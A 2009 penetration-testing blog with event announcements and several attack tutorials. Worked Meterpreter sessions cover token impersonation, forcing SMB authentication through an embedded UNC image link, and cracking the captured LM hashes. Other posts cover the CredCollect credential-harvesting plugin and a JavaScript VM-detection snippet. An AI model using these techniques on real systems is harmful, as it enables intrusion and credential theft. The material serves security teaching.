Monday, April 27, 2009

Social Engineering Master Class at ChicagoCon

I'm excited that next week i'll be attending the Social Engineering Master Class at ChicagoCon with Chris Nickerson and Mike Murray. I'll also be sticking around to give my Client-Side talk for the con portion on Saturday.

The outline for the SE Master Class is up and it looks good!

"The world of Information Security is changing. Budgets are tighter, attacks are more sophisticated, and the corporate network is no longer the low hanging fruit. That leaves web-enabled applications as the vector-du-jour, but that well is quickly drying up for organized crime as well. As they creep up the OSI Model looking for easier ways to steal your corporate assets, they are quickly making their way up the stack to the unspoken 8th layer, the end user. So what is the next step in the never-ending escalation of this cyber war?

To find out, we must do as Sun Tzu taught. "Think like our enemy!" That is, after all, the primary tenet of penetration testing AKA ethical hacking, isn't it? After years of hardening physical systems, networks, OSs, and applications, we have now come full circle to a new dawn of attack. People are now the target of the advanced hacker, and the cross-hairs are focused squarely on their foreheads... literally. It is only a matter of time before corporations feel the pain of wetware hacking requiring a new approach to testing and defense. It has become imperative to assemble a world-class team of experts to train professionals on the technologies and methods of the most dangerous and costly attackers, social engineers."

I think there are still seats available for the class and tickets for the con portion as well.

See everyone in Chicago!


Modern Social Engineering Webcast Part II

Be sure to check out

Part II of the Modern Social Engineering Webcast with Chris Nickerson and Mike Murray

Webcast: Modern Social Engineering Part II - Top 5 Ways to Manipulate Humans Over the Wire

Join world-renowned social engineers, Chris Nickerson of TruTV's Tiger Team and noted expert and international speaker, Mike Murray, as they prepare you for the future of pen testing. This webcast on Thursday April 30, 2009 at 12:00 Noon CDT continues your education in the world of "Modern Social Engineering."

Wednesday, April 22, 2009

Shotgun Blast 22 April 2009

Quick links of relevant stuff that I'm too lazy to fully comment on

1st up, Robert Graham preaching it on why Cyber Commands will fail.

2. Time for an Internet A-Team...Interview with Joe Stewart on what to do about cyber criminals.

3. Laramies on post exploitation with Meterpreter

4. Frankly disappointing news that any country would make a website against the law and order all ISPs to block it ...Belgium FTW!! Talk about the beginning of a slippery slope into China-like behavior...up next Carnal Blog for having a dissenting opinion.

5. Pulling data and file information from system restore points

6. Combating the ora_ntlm_stealer technique. Link to the original white paper also in the post.

7. Online metadata extraction with FOCA

8. Ahh the "forever-ness" of the internet and how stupid ass questions may bite you in the ass later in life...Professor 0110 FTW!!


Monday, April 20, 2009

How do YOU defend against 0day?!

There is an interesting thread over on DailyDave about 0day and what you can do about it.

Its far from complete, so go read the thread and come back...

Thus far Ron Gula's response is the best.

My thoughts on this is that it really depends a lot on the maturity of the environment. Most environments wouldn't stand a chance against even a crappy targeted client-side attack with public vulnerabilities. If you throw in 0day...forget about it But assuming a mature environment, I think you use 0day to test your defenses to targeted and 0day attacks.

Does one 0day totally own your network?

I think using 0day allows you to test:
Are things segregated properly enough that someone popping a shell on a workstation cant get access to "what makes you money"?
Does you HIPS/HIDS stop that stack/heap overflow? Does it stop you from putting new binaries on the box for post exploitation?
Is your AV worth anything? How long before 0day(that eventually becomes public) becomes an AV alert?
Does your network IPS/IDS detect or block the exploit traffic?
Can you detect the outbound traffic? and RESPOND?!
Are your users running with elevated privileges or are your admins doing their regular work with their admin accounts?

that sort of thing...thoughts?

Back from Notacon

g0ne and I just got back from presenting on Client-Side Attacks at Notacon. You can check out his write up here. I have pretty much the same things to say.

It was definitely a unique con especially that it was more "everything tech" versus hardcore like g0ne said we ended up with lots of down time in between talks we were interested in. We spent a bit of time in the lockpick village so that was fun. I usually don't have time to do that stuff because I have talks I want to see.

that's about it...

Up next ChicagoCon in May. I'll also be up there for the Social Engineering Master Class so I'm excited about that.


Sunday, April 12, 2009

carnal0wnage on Exotic Liability Podcast

Chris Nickerson was kind enough to ask me to join him for his Exotic Liability podcast.

You can check it out here:

Main Exotic Liability Page:

I had a blast! I'm really looking forward to hearing the rest of the interviews/podcasts. They had some really sharp people come on the show including Mike Murray, Val Smith, Delchi, and Max Caceres.

Next time we'll get Dean in on the call.

Notes from the podcast (or stuff I forgot to mention but should have)

Oracle Demo video from ShmooCon Firetalk

Metasploit Oracle API and some code (still beta)

**requires Oracle Instantclient and rubydbi and probably some other stuff

SOURCE Boston video of Vince and I's client-side talk

Check out Michael Santarcangelo's book on Defending against Breaches, which has alot to do with educating users, user awareness programs, defending against SE, and handling data breaches....a must read!

g0ne and I will be giving the client-side talk at NotaCon 6 in April and ChicagoCon in May

Friday, April 10, 2009

More on working with Incognito and Metasploit

Since a buddy asked for some clarification on using incognito extension with Metasploit/Meterpreter I'll post some more notes on it.

the background you need is here:

Let's set up the scenario.

We either exploited something...yea! or we guessed an admin password and used the psexec module (that's what I did). the psexec module will drop us to a SYSTEM shell if all went well.

msf exploit(psexec) > sessions

Active sessions

Id Description Tunnel
-- ----------- ------
1 Meterpreter ->

msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: ORACLE-ENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...success.

now we want to query what tokens are available

Incognito Commands

Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token

meterpreter > list_tokens
Usage: list_tokens

Lists all accessible tokens and their privilege level


-g List tokens by unique groupname
-u List tokens by unique username

meterpreter > list_tokens -u

Delegation Tokens Available

Impersonation Tokens Available

We want to become the ORACLE-ENT\Administrator user

meterpreter > impersonate_token
Usage: impersonate_token

Instructs the meterpreter thread to impersonate the specified token. All other actions
will then be made in the context of that token.

Hint: Double backslash DOMAIN\\name (meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator


Ok, should you need to get back to system, just do a rev2self

meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator

Now you'll probably want to run commands as that user...I hope that was the point of all this...

After you load the incognito extension you'll get an extra option with your execute options (-t)

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.


-H Create the process hidden from view.
-a The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d The 'dummy' executable to launch when using -m.
-f The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token

We need to use the "-t" so we can use the impersonated thread token, otherwise you'll get a shell as SYSTEM or whoever you were.

meterpreter > execute -f cmd.exe -H -c -i -t
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.



Detecting VMware with JavaScript (or how to waste your time with pointless exercises)

So a thread on discussed some JavaScript tricks that web exploit kits are using to screw with analysts looking at the malicious sites and js. Today most analysts will use a debugger or interpreter like Rhino or Malzilla. Well, the site authors are starting to add code to either cause the script to exit when run in one of the interpreters or to do more malicious stuff like delete files and such. [original article]

One of the questions asked was if it was possible, or currently being implemented by malware authors, to use JavaScript to detect if the browser was inside a virtual machine. Before I continue let me say that this is completely pointless from a malware perspective. Detecting the presence of a vm using client side JavaScript is just silly. Not hard to bypass. Just comment it out and move on. Now if this could be done server side then perhaps it might have value. Still pointless though.

Anyway I wondered if you could do it using JavaScript and so wasted way too much time on getting it to work. I guess you could do this in Java but regardless of how you do it the user will need to interact with your script to run it. If there is a way to bypass that requirement then let me know.

There are various methods out there for detecting vm's but for this example I figured I'd keep it simple and use the MAC address as an indicator. VMware has their own OUI for the MAC addresses that are dynamically generated when you install VMware Workstation. The OUI is different for VMware Player but I focused on Workstation. I figured that an ActiveX object would be the easiest way to go to determine the MAC and if it matched the OUI then to alert.

After fooling around a bit I came up with this:

</script language="javascript">
function vmDetect(){
var o = new ActiveXObject("WbemScripting.SWbemLocator");
var s = o.ConnectServer(strServer = ".");
var a = s.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration");
var e = new Enumerator(a);
var mac = [];
var regex = /(00:50:56).*/; //OUI of VMware's dynamically generated MAC address.

for (;!e.atEnd();e.moveNext()){ //Loop over Adapter properties.
var x = e.item();
mac[mac.length] = x.MACAddress;
for (var i=0; i<mac.length; i++) {
if (mac[i].match(regex)) {
alert("ohnes! you're in a virtual machine");

Basically the script uses the ConnectServer method of the SWbemLocator object to get the SWbemServices ExecQuery method to return an object. In this case we are querying the Win32_NetworkAdapterConfiguration WMI class to return the properities of the network adapters on the system. Once we have these values we, quite unnecessarily, add the MACAddress values to an array and then iterate through the array alerting on the first string that matches the regular expression we created.

You don't really need the array. You could remove the array and just do:

if (x.MACAddress.match(regex)) {
alert("ohnes! you're in a virtual machine");

So yes, you can use JavaScript, or in my case bad JavaScript, to determine, at a basic level, if you're in a vm. But like I said. It's kinda pointless. :)

dean de beer

Monday, April 6, 2009

Maltego for Network Infrastructure Enumeration

New article on Using Maltego for Network Infrastructure Enumeration posted on

Any organization that has an Internet presence needs to have some form of infrastructure to support their presence. During Infrastructure Enumeration you attempt to discover how much of it exists, what type of infrastructure is used, where it is located, what technology is used and how it is structured. This type of information is interesting for:

* Security assessments (as this is the first and most tedious phase of any external assessment).
* Getting an idea of the organization’s Internet and geographical presence.
* Gaining insight into the technology used by the organization.
* Making connections between seemingly unconnected organizations (as they might be sharing common infrastructure).
* Getting a list of brands or affiliations supported by the organization.

Read the article over on

Using the Metasploit SMB Sniffer Module

There has been some talk about using the SMB Relay module in Metasploit and then trying to crack those hashes. I'll spare the links to protect the uninformed.

The SMB Relay module is for doing just what it says, relaying the SMB session back to another host. It used to be the same host but now, post 08-068, you have to pick another system on the network. Doesn't matter what system, just not the same system. (I'll try to cover this in another blog post soon)

Additionally, the SMB Relay module provides a random challenge for each attempt and doesn't log those challenges anywhere that you could go back and use. So that pretty much rules out using the hashes you see in the output for password cracking.

For background it looks like this which looks just like the one that will work :-(
[*] Received XPSP1VM\vmwareXP LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1

So what are we to do? Use the SMB Sniffer module of course!

The SMB sniffer module allows you to capture LM/NTLM hashes that can be cracked later. It uses a known challenge key which allows you to crack the hash offline.
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > info

Name: Authentication Capture: SMB
Version: 5966

Provided by:

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path(\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.

We need to force a victim to authenticate to metasploit. The easiest way is to embed a UNC link into a webpage or email.

Example: img src="\\networkIP\share\1.gif"

Once the victim's browser tries to authenticate, the sniffer module will capture the hashes (which can be cracked later using rainbow tables). You'll notice the difference between this module and SMB Relay which issues a random challenge making cracking impossible. So if you want to crack passwords, use the server/capture/smb auxiliary module, if you want to try to get a shell use the smb_relay exploit module.

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
[*] Auxiliary module running as background job
msf auxiliary(smb) >
[*] Server started.
[*] Captured XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1

We can now use HALFLM rainbow tables with the 1122334455667788 challenge to crack the first half of the password.

**We only take the first 16 characters of the LM hash output


We can then use rainbow tables to crack the first half:

$ ./rcracki *.rti -h 76365e2d142b5612
264241152 bytes read, disk access time: 4.97 s
verifying the file...
searching for 1 hash...
plaintext of 76365e2d142b5612 is PASSWOR
cryptanalysis time: 5.24 s

plaintext found: 1 of 1 (100.00%)
total disk access time: 4.97 s
total cryptanalysis time: 5.24 s
total chain walk step: 1783216
total false alarm: 591
total chain walk step due to false alarm: 703255

76365e2d142b5612 PASSWOR hex:50415353574f52

You will have to guess or bruteforce the rest :-( but thankfully there is a tool in your metasploit tools directory to help you do just that!

$ ruby halflm_second.rb

Usage: halflm_second.rb


-h Display this help information
-n The encypted LM hash to crack
-p The decrypted LANMAN password for bytes 1-7

$ ruby halflm_second.rb -n 76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d -p PASSWOR
[*] Trying one character...
[*] Cracked: PASSWORD

Carnal0wnage Blog makes the top 5 Best Technical Security Blog

I am happy to announce that Carnal0wnage Blog made the top 5 Best Technical Security Blogs for the RSA Social Security Awards

Best Technical Security Blog

Carnal 0wnage
Zero Day
Schneier on Security
Rational Survivability

Thanks to everyone that voted or to whoever coded up that burp script :-)

Thursday, April 2, 2009

Automatic credential collection and storage with CredCollect

In previous posts here at Carnal0wnage, CG has diligently covered using MSF and meterpreter to do all kinds of stuff, including grabbing hashes with the Priv extension (Vinnie Liu) and tokens with the Incognito extension (Luke Jennings). These are powerful post-exploitation features that yield invaluable information to the engaging team, therefore the presentation and accessibility of this data becomes an important factor as the scale of the engagement and number of targets grows. CredCollect is a simple plugin for MSF that hooks meterpreter session events and performs the gathering and persistent storage of this data for you transparently.

Upon successful session creation, the CredCollect plugin determines if the session opened is indeed a meterpreter session, loads the Priv and Incognito extensions, and extracts the hashes and tokens from the target. The plugin then stores each hash and token as a Note in the database of the framework instance and hands the session back to the console for the user to interact with it at the standard meterpreter> prompt.

The plugin also adds two commands to the MSF console when loaded named db_hashes and db_tokens respectively. The db_hashes command prints all of the hashes accrued in the database in a format suitable for import into various password crackers (OphCrack, L0pht, etc). The db_tokens command simply prints all of the tokens in the database with the host they were found on.

msf > help

credcollect Commands
Command Description
------- -----------
db_hashes Dumps hashes collected in the database
db_tokens Dumps tokens collected in the database with host information

The utility of this plugin is best realized in medium to large scale engagements (read: beaucoup shellz) such as internal engagements or external phishing campaigns that result in multiple parallel sessions returning to the team at unpredicted rates and times.

Some common scenarios of use and bite-sized demos:

The db_hashes command is useful after a day or two of sweeping for low hanging fruit and pilfering hashes. The team can easily export all of the credentials that were transparently collected in the database and start cracking them for the next phase of the attack.

msf auxiliary(psexec) >
[*] Meterpreter session 1 opened ( ->
[*] This is CredCollect, I have the conn!

[*] Meterpreter session 2 opened ( ->
[*] This is CredCollect, I have the conn!

[*] Meterpreter session 3 opened ( ->
[*] This is CredCollect, I have the conn!

[*] Meterpreter session 4 opened ( ->
[*] This is CredCollect, I have the conn!

msf auxiliary(psexec) > db_hashes

The db_tokens command is useful in situations where you seek a specific user token and want to know if you've found that token on any of the boxes the team has compromised. For example, if you were to own a local service account or backup admin account, you could plug those credentials into psexec_scanner and automate searching an entire subnet or domain for a box with a domain admin token on it that you have gained access to.


As you can see highlighted, we have found the desired 'batman' user token is accessible on ''.

And at the end of the day, all of these are just Note's in the MSF database so you can display them as such, or query the information from the actual database file with any sqlite client.

msf auxiliary(psexec) > db_notes
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host= type=auth_SMB data=AUTH Administrator password
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host= type=auth_SMB data=AUTH Administrator password
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host= type=auth_SMB data=AUTH Administrator password
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host= type=auth_TOKEN data=LAB-B2257C3B992\batman
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host= type=auth_TOKEN data=NT AUTHORITY\SYSTEM
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host= type=auth_TOKEN data=LAB-B2257C3B992\labadmin
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host= type=auth_TOKEN data=NT AUTHORITY\ANONYMOUS LOGON

So you can load the CredCollect plugin at startup and transparently collect credential information, also, since the initial implementation of this code was in a meterpreter script, you can drop the credcollect meterpreter script in your scripts directory and use it in one-off cases or whatever if you feel more comfortable doing it manually than loading the plugin.

Source or it didn't happen..

Plugin - Script

This plugin was definitely inspired by a similar effort that Valsmith and Colin Ames (now of AttackResearch) presented at DefCon 16 in their talk 'Meta-Post Exploitation' called MetaPass but to my knowledge that plugin was never publicly released.

PS. For a while a hairy thread issue kept this thing from working reliably so I'd like to thank egypt and icer for helping me debug it and track it down and hdm for ultimately fixing it in Changeset 6831